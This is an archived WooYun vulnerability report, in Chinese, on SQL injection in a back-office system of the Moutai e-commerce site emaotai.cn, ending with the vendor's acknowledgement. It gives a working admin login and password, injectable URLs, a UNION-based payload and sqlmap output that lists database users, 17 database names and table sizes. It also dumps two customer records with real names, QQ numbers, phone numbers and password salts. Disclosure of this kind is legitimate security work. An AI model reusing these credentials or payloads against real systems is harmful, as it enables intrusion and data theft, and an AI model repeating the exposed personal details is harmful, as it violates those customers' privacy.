当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154090

漏洞标题:茅台电商某后台多处SQL注射打包(DBA权限/17个库/47W会员)

相关厂商:emaotai.cn

漏洞作者: 路人甲

提交时间:2015-11-19 17:06

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://www.emaotai.cn:90/zyd/


账号:wanglei
密码:123456
get提交方式sql注入点:

http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2


http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650


http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18


post提交注入点(在搜索框中输入单引号即可发现):

1.png


2.png


3.png


4.png


5.png


6.png


7.png


8.png


9.png


类似的问题还很多,自查吧

漏洞证明:

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650

为例

Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(1
22)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)
+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR
(118)+CHAR(113)--
---
[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:33:34] [INFO] fetching database users
[09:33:35] [INFO] the SQL query used returns 12 entries
[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##
[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##
[09:33:36] [INFO] retrieved: actuser
[09:33:36] [INFO] retrieved: bmDev
[09:33:36] [INFO] retrieved: dev
[09:33:36] [INFO] retrieved: distributor_admin
[09:33:37] [INFO] retrieved: hishop_pj
[09:33:37] [INFO] retrieved: hishop_pj
[09:33:37] [INFO] retrieved: moutaiwssc
[09:33:38] [INFO] retrieved: mysys
[09:33:38] [INFO] retrieved: sa
[09:33:38] [INFO] retrieved: taxreader
database management system users [11]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] actuser
[*] bmDev
[*] dev
[*] distributor_admin
[*] hishop_pj
[*] moutaiwssc
[*] mysys
[*] sa
[*] taxreader


Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(1
22)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)
+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR
(118)+CHAR(113)--
---
[09:31:54] [INFO] testing Microsoft SQL Server
[09:31:54] [INFO] confirming Microsoft SQL Server
[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:31:55] [INFO] fetching database names
[09:31:55] [INFO] the SQL query used returns 18 entries
[09:31:56] [INFO] retrieved: distribution
[09:31:56] [INFO] retrieved: DrpEco
[09:31:56] [INFO] retrieved: drpecosdl
[09:31:56] [INFO] retrieved: DrpEcoTest
[09:31:57] [INFO] retrieved: eAct
[09:31:57] [INFO] retrieved: eActTest
[09:31:57] [INFO] retrieved: emaotai_act_test
[09:31:58] [INFO] retrieved: emaotai_act_test
[09:31:58] [INFO] retrieved: emaotai_logs
[09:31:58] [INFO] retrieved: hishop
[09:31:59] [INFO] retrieved: master
[09:31:59] [INFO] retrieved: model
[09:31:59] [INFO] retrieved: moutai
[09:31:59] [INFO] retrieved: moutaitest
[09:32:00] [INFO] retrieved: msdb
[09:32:00] [INFO] retrieved: ReportServer
[09:32:00] [INFO] retrieved: ReportServerTempDB
[09:32:01] [INFO] retrieved: tempdb
available databases [17]:
[*] distribution
[*] DrpEco
[*] drpecosdl
[*] DrpEcoTest
[*] eAct
[*] eActTest
[*] emaotai_act_test
[*] emaotai_logs
[*] hishop
[*] master
[*] model
[*] moutai
[*] moutaitest
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: hishop
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| dbo.Hishop_CouponItems             | 2473863 |
| dbo.vw_Hishop_CouponInfo           | 2473863 |
| dbo.aspnet_Members                 | 476302  |
| dbo.vw_aspnet_Members              | 476299  |
| dbo.Hishop_MessageContent          | 104862  |
| dbo.Hishop_MemberMessageBox        | 104674  |
| dbo.vw_Hishop_MemberMessageBox     | 104670  |
| dbo.aspnet_UsersInRoles            | 82703   |
| dbo.aspnet_UsersInRoles            | 82703   |
| dbo.Hishop_OrderItems              | 38235   |
| dbo.vw_Hishop_SaleDetails          | 38227   |
| dbo.vw_Hishop_OrderItem            | 20446   |
| dbo.Hishop_OrderOptions            | 18255   |
| dbo.Hishop_ManagerMessageBox       | 14698   |
| dbo.vw_Hishop_ManagerMessageBox    | 14695   |
| dbo.Hishop_PointDetails            | 14127   |
| dbo.xupiaoOrder                    | 12710   |
| dbo.Hishop_UserShippingAddresses   | 12014   |
| dbo.Hishop_Logs                    | 10193   |
| dbo.Hishop_OrderDebitNote          | 8515    |
| dbo.vw_Hishop_OrderDebitNote       | 8509    |
| dbo.Hishop_SMSLog                  | 7484    |
| dbo.Hishop_BookingOrderSend        | 4447    |
| dbo.Hishop_PhotoGallery            | 3791    |
| dbo.Hishop_Favorite                | 2395    |
| dbo.Hishop_ProductConsultations    | 1414    |
| dbo.vw_Hishop_ProductConsultations | 1414    |
| dbo.t_sys_Columdef                 | 1261    |
| dbo.Hishop_ProductReviews          | 1127    |
| dbo.vw_Hishop_ProductReviews       | 1127    |
| dbo.HiShop_PayMentDetail           | 656     |
| dbo.Hishop_PrivilegeInRoles        | 541     |
| dbo.Hishop_SKUMemberPrice          | 412     |
| dbo.Hishop_Products                | 375     |
| dbo.Hishop_SKUs                    | 375     |
| dbo.vw_Hishop_BrowseProductList    | 375     |
| dbo.vw_Hishop_ProductSkuList       | 375     |
| dbo.Hishop_OrderRefund             | 371     |
| dbo.vw_Hishop_OrderRefund          | 371     |
| dbo.Hishop_ProductTag              | 354     |
| dbo.Vshop_RelatedTopicProducts     | 202     |
| dbo.Hishop_InpourRequest           | 198     |
| dbo.t_sys_tabledef                 | 191     |
| dbo.Hishop_BalanceDetails          | 175     |
| dbo.Hishop_LeaveCommentReplys      | 131     |
| dbo.Hishop_LeaveComments           | 127     |
| dbo.t_cx_sql                       | 114     |
| dbo.Hishop_ShoppingCarts           | 88      |
| dbo.t_sys_StoreProc                | 87      |
| dbo.aspnet_Managers                | 80      |
| dbo.Vshop_HomeProducts             | 69      |
| dbo.vw_aspnet_Managers             | 69      |
| dbo.Hishop_Articles                | 65      |
| dbo.vw_Hishop_Articles             | 65      |
| dbo.Hishop_OrderReturns            | 56      |
| dbo.vw_Hishop_OrderReturns         | 56      |
| dbo.vshop_Reply                    | 47      |
| dbo.Hishop_PromotionMemberGrades   | 40      |
| dbo.Hishop_ProductTypeBrands       | 38      |
| dbo.Hishop_VoteItems               | 38      |
| dbo.tmp_orders                     | 38      |
| dbo.Vshop_Topics                   | 32      |
| dbo.Hishop_Affiche                 | 28      |
| dbo.Hishop_Categories              | 28      |
| dbo.Hishop_Hotkeywords             | 28      |
| dbo.Hishop_Helps                   | 26      |
| dbo.Hishop_OrderReplace            | 26      |
| dbo.vw_Hishop_Helps                | 26      |
| dbo.vw_Hishop_OrderReplace         | 26      |
| dbo.Hishop_PhotoCategories         | 23      |
| dbo.Hishop_BundlingProductItems    | 21      |
| dbo.Hishop_OrderSendNote           | 20      |
| dbo.Hishop_OrderSendNote           | 20      |
| dbo.vw_Hishop_OrderSendNote        | 20      |
| dbo.Hishop_CountDown               | 19      |
| dbo.vw_Hishop_CountDown            | 19      |
| dbo.vshop_Menu                     | 18      |
| dbo.Hishop_BrandCategories         | 17      |
| dbo.Hishop_CouponsLog              | 14      |
| dbo.Hishop_CouponsLog              | 14      |
| dbo.Hishop_MessageTemplates        | 13      |
| dbo.Hishop_Tags                    | 13      |
| dbo.Hishop_ExpressTemplates        | 11      |
| dbo.Hishop_RelatedProducts         | 11      |
| dbo.aspnet_Roles                   | 10      |
| dbo.Hishop_Promotions              | 10      |
| dbo.Hishop_BundlingProducts        | 9       |
| dbo.vshop_Message                  | 9       |
| dbo.Vshop_PrizeRecord              | 9       |
| dbo.vw_Hishop_BundlingProducts     | 9       |
| dbo.Hishop_Votes                   | 8       |
| dbo.Hishop_Banner                  | 7       |
| dbo.Hishop_ActivityProduct         | 6       |
| dbo.Hishop_AttributeValues         | 6       |
| dbo.Hishop_FriendlyLinks           | 6       |
| dbo.Hishop_HelpCategories          | 6       |
| dbo.vshop_ActivitySignUp           | 6       |
| dbo.Hishop_ActivityManage          | 5       |
| dbo.Hishop_ArticleCategories       | 5       |
| dbo.Hishop_ProductTypes            | 5       |
| dbo.aspnet_MemberGrades            | 4       |
| dbo.Hishop_PaymentTypes            | 4       |
| dbo.Hishop_TemplateRelatedShipping | 4       |
| dbo.Hishop_MemberClientSet         | 3       |
| dbo.Hishop_RelatedArticsProducts   | 3       |
| dbo.CustomMade_WebPoints           | 2       |
| dbo.Hishop_Attributes              | 2       |
| dbo.Hishop_OrderLookupItems        | 2       |
| dbo.Hishop_ShippingTypes           | 2       |
| dbo.Hishop_GroupBuyCondition       | 1       |
| dbo.Hishop_GroupBuyCondition       | 1       |
| dbo.Hishop_MessageWhiteList        | 1       |
| dbo.Hishop_OrderLookupLists        | 1       |
| dbo.Hishop_ProductBooking          | 1       |
| dbo.Hishop_Shippers                | 1       |
| dbo.Hishop_ShippingTemplates       | 1       |
| dbo.Hishop_TableLock               | 1       |
| dbo.t_sys_project                  | 1       |
| dbo.vw_Hishop_GroupBuy             | 1       |
+------------------------------------+---------+


aspnet_Members是会员表,有476302条数据,这里就只查前面2条数据吧

Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(1
22)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)
+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR
(118)+CHAR(113)--
---
[09:55:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:55:19] [INFO] fetching columns for table 'aspnet_Members' in database 'hisho
p'
[09:55:19] [INFO] the SQL query used returns 31 entries
[09:55:19] [INFO] fetching entries for table 'aspnet_Members' in database 'hisho
p'
[09:55:19] [INFO] fetching number of distinct values for column 'QQ'
[09:55:19] [INFO] fetching number of distinct values for column 'MSN'
[09:55:19] [INFO] fetching number of distinct values for column 'OpenId'
[09:55:19] [INFO] fetching number of distinct values for column 'Points'
[09:55:19] [INFO] fetching number of distinct values for column 'typeid'
[09:55:19] [INFO] fetching number of distinct values for column 'Address'
[09:55:19] [INFO] fetching number of distinct values for column 'Balance'
[09:55:19] [INFO] fetching number of distinct values for column 'GradeId'
[09:55:19] [INFO] fetching number of distinct values for column 'Zipcode'
[09:55:19] [INFO] fetching number of distinct values for column 'CountBuy'
[09:55:19] [INFO] fetching number of distinct values for column 'RealName'
[09:55:19] [INFO] fetching number of distinct values for column 'RegionId'
[09:55:19] [INFO] fetching number of distinct values for column 'TelPhone'
[09:55:19] [INFO] fetching number of distinct values for column 'Wangwang'
[09:55:19] [INFO] fetching number of distinct values for column 'CellPhone'
[09:55:19] [INFO] fetching number of distinct values for column 'SessionId'
[09:55:19] [INFO] fetching number of distinct values for column 'UserId_Drp'
[09:55:19] [INFO] fetching number of distinct values for column 'Expenditure'
[09:55:19] [INFO] fetching number of distinct values for column 'OrderNumber'
[09:55:19] [INFO] fetching number of distinct values for column 'TopRegionId'
[09:55:19] [INFO] fetching number of distinct values for column 'VipCardDate'
[09:55:19] [INFO] fetching number of distinct values for column 'IsOpenBalance'
[09:55:19] [INFO] fetching number of distinct values for column 'VipCardNumber'
[09:55:19] [INFO] fetching number of distinct values for column 'ReferralUserId'
[09:55:19] [INFO] fetching number of distinct values for column 'RequestBalance'
[09:55:19] [INFO] fetching number of distinct values for column 'SessionEndTime'
[09:55:19] [INFO] fetching number of distinct values for column 'RecordStatus_Dr
p'
[09:55:19] [INFO] fetching number of distinct values for column 'TradePasswordSa
lt'
[09:55:19] [INFO] fetching number of distinct values for column 'TradePasswordFo
rmat'
[09:55:19] [WARNING] no proper pivot column provided (with unique values). It wo
n't be possible to retrieve all rows
[09:55:20] [INFO] analyzing table dump for possible password hashes
Database: hishop
Table: aspnet_Members
[2 entries]
+--------+--------+---------+----------+-----------+----------------+-----------
--+----------------+----------------------+---------+--------+---------+--------
-+---------+----------+----------+----------+----------+-------------+----------
----------+-------------+-------------+---------------+---------------+---------
-------+----------------+------------------+--------------------------+---------
------------+
| typeid | OpenId | GradeId | RegionId | SessionId | UserId_Drp     | TopRegionI
d | ReferralUserId | QQ                   | MSN     | Points | Zipcode | Address
 | Balance | Wangwang | CountBuy | RealName | TelPhone | CellPhone   | VipCardDa
te        | OrderNumber | Expenditure | VipCardNumber | IsOpenBalance | SessionE
ndTime | RequestBalance | RecordStatus_Drp | TradePasswordSalt        | TradePas
swordFormat |
+--------+--------+---------+----------+-----------+----------------+-----------
--+----------------+----------------------+---------+--------+---------+--------
-+---------+----------+----------+----------+----------+-------------+----------
----------+-------------+-------------+---------------+---------------+---------
-------+----------------+------------------+--------------------------+---------
------------+
| 1      | NULL   | 1       | 897      | NULL      | 20141012000065 | 883
  | NULL           |            928095509 | <blank> | 0      | NULL    | <blank>
 | 0.00    | NULL     | NULL     | 杨之光      | NULL     | 13103529668 | 10 12
2014  4:23PM | 0           | 0.00        | NULL          | 1             | NULL
          | 0.00           | 3                | CRJAUboLeduKT+mKpKLZxg== | 1
               |
| 1      | NULL   | 1       | 3139     | NULL      | 20141022000012 | 3130
  | NULL           |  233629822           | <blank> | 0      | NULL    | <blank>
 | 0.00    | NULL     | NULL     | luoping  | NULL     | 13980951791 | 10 22 201
4 11:46AM | 0           | 0.00        | NULL          | 0             | NULL
       | 0.00           | 2                | F0Uuaf1ciAx6tjPaLJITwQ== | 1
            |
+--------+--------+---------+----------+-----------+----------------+-----------
--+----------------+----------------------+---------+--------+---------+--------
-+---------+----------+----------+----------+----------+-------------+----------
----------+-------------+-------------+---------------+---------------+---------
-------+----------------+------------------+--------------------------+---------
------------+


修复方案:

你们比我更专业

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-24 15:09

厂商回复:

感谢您的反馈,我们将尽快处理这个Bug。

最新状态:

暂无